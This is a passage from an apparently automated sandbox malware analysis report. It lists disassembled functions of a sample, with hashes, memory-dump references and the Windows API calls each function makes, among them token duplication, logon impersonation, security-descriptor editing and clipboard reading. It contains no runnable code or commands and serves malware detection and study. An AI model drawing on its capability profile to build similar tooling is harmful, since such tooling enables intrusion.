                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: d4da4f2fa68fa9374a5d6a05f6f6d8a44130f12bec67e862c2520b3816d8ffb6
                                                                                                                                                                              • Instruction ID: 83d8e9ec05db2352ce147e7f35a5f173555c3487fb8de22bbae90e55ff0f7d82
                                                                                                                                                                              • Opcode Fuzzy Hash: d4da4f2fa68fa9374a5d6a05f6f6d8a44130f12bec67e862c2520b3816d8ffb6
                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0B432551E2567EB315A26FC05F7B3749EF417A0F184017B804AB298DA21D80146F0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: ab55880500d89b73eade3b26fd0b4478a046a36a476e48bc1278f2e44aff9947
                                                                                                                                                                              • Instruction ID: 1a26baa15ef7a361544bcc0e9c8007daf5689e4a43912aff9fe15a7682b569ad
                                                                                                                                                                              • Opcode Fuzzy Hash: ab55880500d89b73eade3b26fd0b4478a046a36a476e48bc1278f2e44aff9947
                                                                                                                                                                              • Instruction Fuzzy Hash: 26E0652124162166DA316676FC05F5B7A48DF413A0F1A0167EC46AB691DB70DD40C5B6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0bc92cd67943ff3b7c03e86adea4abe9a154ee11f7114ca8f0fd2bf215ab5f2c
                                                                                                                                                                              • Instruction ID: 948383babf70527fdf7a7d8b75450cf5a1dcea7e40e07f995dbc3aa521cae546
                                                                                                                                                                              • Opcode Fuzzy Hash: 0bc92cd67943ff3b7c03e86adea4abe9a154ee11f7114ca8f0fd2bf215ab5f2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF039B1105B42CFCB349F65E8A4816BBE4BF15369328897EE1DA87A10C772D844DF60
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                              • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                              • Instruction ID: 8b51bdfa3bd211f8fb15046a9d5848a265e0cc5b8bba6b76f2b68e94df15c35b
                                                                                                                                                                              • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F0F87550024DFFDF05DF90C941E9E7B79FB04318F248449F9159A151C376EA21ABA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DA3963
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                              • Opcode ID: 180ccbc4dbeae29e5ad9abe7663f47ef391c70d310ab3aa17f135a4c1b487aed
                                                                                                                                                                              • Instruction ID: 3020c965bbb5a45852ce8d3662f71c4c2777c66ab88cf348b9c3a3d1cdbcf807
                                                                                                                                                                              • Opcode Fuzzy Hash: 180ccbc4dbeae29e5ad9abe7663f47ef391c70d310ab3aa17f135a4c1b487aed
                                                                                                                                                                              • Instruction Fuzzy Hash: 91F0A770904309AFE752DF24DC497967BFCA701708F0000A9A288A7186DB7447CCCF61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DA3A76
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongNamePath_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541455249-0
                                                                                                                                                                              • Opcode ID: ca9e4b2391c1d890038483e947979e5a8da14a7bb0740abaf08ab85209c59bce
                                                                                                                                                                              • Instruction ID: 705b2c108005d9607116c1e74794e2ac05c61cd8f61efd8d68800ba231074502
                                                                                                                                                                              • Opcode Fuzzy Hash: ca9e4b2391c1d890038483e947979e5a8da14a7bb0740abaf08ab85209c59bce
                                                                                                                                                                              • Instruction Fuzzy Hash: DDE0CD72D041285BC710A2599C05FEA77DDDFC8790F0440B1FD05D7254D960DD8095B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00DE0A84,?,?,00000000,?,00DE0A84,00000000,0000000C), ref: 00DE0737
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                              • Opcode ID: 7005e82f69f8d25fa6242973643f7a06d86c4a9b2c603a08ef05ee7924bda1a1
                                                                                                                                                                              • Instruction ID: f5d0126c3e080829431ed015e5148817f87bce47a7720f87d341e02284defa3e
                                                                                                                                                                              • Opcode Fuzzy Hash: 7005e82f69f8d25fa6242973643f7a06d86c4a9b2c603a08ef05ee7924bda1a1
                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD06C3200010DBFDF028F85ED06EDA3FAAFB48714F014000BE5866020C732E821AB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: 4d43669983d0b9d58352948632779e70374437d7bce7781fd0d05f4302080865
                                                                                                                                                                              • Instruction ID: 4aaa7258e165545a1c356a758318da1ec2bdcb61de363acfc890325e52b6d247
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d43669983d0b9d58352948632779e70374437d7bce7781fd0d05f4302080865
                                                                                                                                                                              • Instruction Fuzzy Hash: 70B0922410460409ED280A386A0E99A372079463A97DC6FD0E479A52F1C339889FA950
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E0DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E0DCCB
                                                                                                                                                                                • Part of subcall function 00E0DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DD1B
                                                                                                                                                                                • Part of subcall function 00E0DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E0DD2C
                                                                                                                                                                                • Part of subcall function 00E0DC54: FindClose.KERNEL32(00000000), ref: 00E0DD43
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E1666E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2191629493-0
                                                                                                                                                                              • Opcode ID: fe4fcc819e546c49c6216cf07d27bad2565dd274ed1c0de789e7ed68f93c7dba
                                                                                                                                                                              • Instruction ID: f73bf5849a8929ffdbaefacd78e78b9551d626857028a4984c203bfcad4c1c6f
                                                                                                                                                                              • Opcode Fuzzy Hash: fe4fcc819e546c49c6216cf07d27bad2565dd274ed1c0de789e7ed68f93c7dba
                                                                                                                                                                              • Instruction Fuzzy Hash: 14F0A7356041048FD714EF59D855B6EB7E5EF85720F048409F9499B352CB74BC41CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E02010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0205A
                                                                                                                                                                                • Part of subcall function 00E02010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E02087
                                                                                                                                                                                • Part of subcall function 00E02010: GetLastError.KERNEL32 ref: 00E02097
                                                                                                                                                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E01BD2
                                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E01BF4
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E01C05
                                                                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E01C1D
                                                                                                                                                                              • GetProcessWindowStation.USER32 ref: 00E01C36
                                                                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 00E01C40
                                                                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E01C5C
                                                                                                                                                                                • Part of subcall function 00E01A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E01B48), ref: 00E01A20
                                                                                                                                                                                • Part of subcall function 00E01A0B: CloseHandle.KERNEL32(?,?,00E01B48), ref: 00E01A35
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                              • String ID: $default$winsta0$j
                                                                                                                                                                              • API String ID: 22674027-2615587742
                                                                                                                                                                              • Opcode ID: 2fc2dc03a05139bc5fb01f092ccd7793fa1d5c46d459cb65b89f4ec6a612f227
                                                                                                                                                                              • Instruction ID: b8d89156dd892ffff2017f83e281c1cebfaac82980dde4aa800371f63cfc157b
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fc2dc03a05139bc5fb01f092ccd7793fa1d5c46d459cb65b89f4ec6a612f227
                                                                                                                                                                              • Instruction Fuzzy Hash: 5A818C71904209AFDF119FA5EC49FEE7FB8EF04309F14506AF914BA1A0D7718999CB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01A60
                                                                                                                                                                                • Part of subcall function 00E01A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A6C
                                                                                                                                                                                • Part of subcall function 00E01A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A7B
                                                                                                                                                                                • Part of subcall function 00E01A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A82
                                                                                                                                                                                • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E01A99
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E01518
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E0154C
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00E01563
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00E0159D
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E015B9
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00E015D0
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E015D8
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00E015DF
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E01600
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00E01607
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E01636
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E01658
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E0166A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E01691
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E01698
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E016A1
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E016A8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E016B1
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E016B8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E016C4
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E016CB
                                                                                                                                                                                • Part of subcall function 00E01ADF: GetProcessHeap.KERNEL32(00000008,00E014FD,?,00000000,?,00E014FD,?), ref: 00E01AED
                                                                                                                                                                                • Part of subcall function 00E01ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E014FD,?), ref: 00E01AF4
                                                                                                                                                                                • Part of subcall function 00E01ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E014FD,?), ref: 00E01B03
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                              • Opcode ID: b83258824ce4c47540e392f93acfba966a9d421d91258b8854540997d28bea78
                                                                                                                                                                              • Instruction ID: 457e2483e5bb83b13b15deb72e79b911e5e5c6fd0bd104e8cdb809660ae7a71f
                                                                                                                                                                              • Opcode Fuzzy Hash: b83258824ce4c47540e392f93acfba966a9d421d91258b8854540997d28bea78
                                                                                                                                                                              • Instruction Fuzzy Hash: AC717AB2900209AFDF10DFA5EC48FAEBBB9BF04714F084555F915BB190D7329A49CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenClipboard.USER32(00E3DCD0), ref: 00E1F586
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E1F594
                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00E1F5A0
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00E1F5AC
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E1F5E4
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00E1F5EE
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E1F619
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00E1F626
                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 00E1F62E
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E1F63F
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E1F67F
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 00E1F695
                                                                                                                                                                              • GetClipboardData.USER32(0000000F), ref: 00E1F6A1
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E1F6B2
                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E1F6D4
                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E1F6F1
                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E1F72F
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E1F750
                                                                                                                                                                              • CountClipboardFormats.USER32 ref: 00E1F771
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00E1F7B6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 420908878-0
                                                                                                                                                                              • Opcode ID: 9bcec20ef5f2c37c23b5150c324b6da44599cab2dad42f5fb0f7d957a1196c8e
                                                                                                                                                                              • Instruction ID: 70d9b771924342da259d2a6576d6eb568623f4fb7e8d8997fc6408045e16571d
                                                                                                                                                                              • Opcode Fuzzy Hash: 9bcec20ef5f2c37c23b5150c324b6da44599cab2dad42f5fb0f7d957a1196c8e
                                                                                                                                                                              • Instruction Fuzzy Hash: 6561A1312042059FD300EF21EC89FAABBE4EF84718F14556DF456A72A2DB31DD89CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E17403
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E17457
                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E17493
                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E174BA
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E174F7
                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E17524
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                              • API String ID: 3830820486-3289030164
